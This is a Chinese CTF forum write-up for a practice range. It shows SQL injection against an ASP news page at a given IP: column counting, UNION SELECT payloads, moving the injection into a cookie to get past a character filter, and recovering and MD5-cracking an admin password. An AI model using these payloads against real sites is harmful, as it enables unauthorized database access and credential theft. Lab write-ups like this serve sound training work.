靶场第二题 九五作业

九五   ·   发表于 2018-07-31 16:17:52   ·   CTF&WP专版

点击新闻得到链接http://120.203.13.75:8001/shownews.asp?id=171
尝试 order by 10 页面正常,order by 11显示数据错误,判断有10个字段
猜测有没有admin这个表 and 1=2 union select 1,2,3,4,5,6,7,8,9,10 from admin
弹出框显示非法字符
用谷歌浏览器打开http://120.203.13.75:8001/shownews.asp 用插件modify headers
输入cookie值 id=171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin
发现页面显示2,3,7,8,9
尝试猜测表名字段id=171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin
得到admin b9a2a2b5dffb918c 这个应该是密码,用md5解密得到密码welcome

打赏我,让我更有动力~

1 条回复   |  直到 2020-8-27 | 1285 次浏览

cloudcoll
发表于 2020-8-27

改cookie没用啊

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.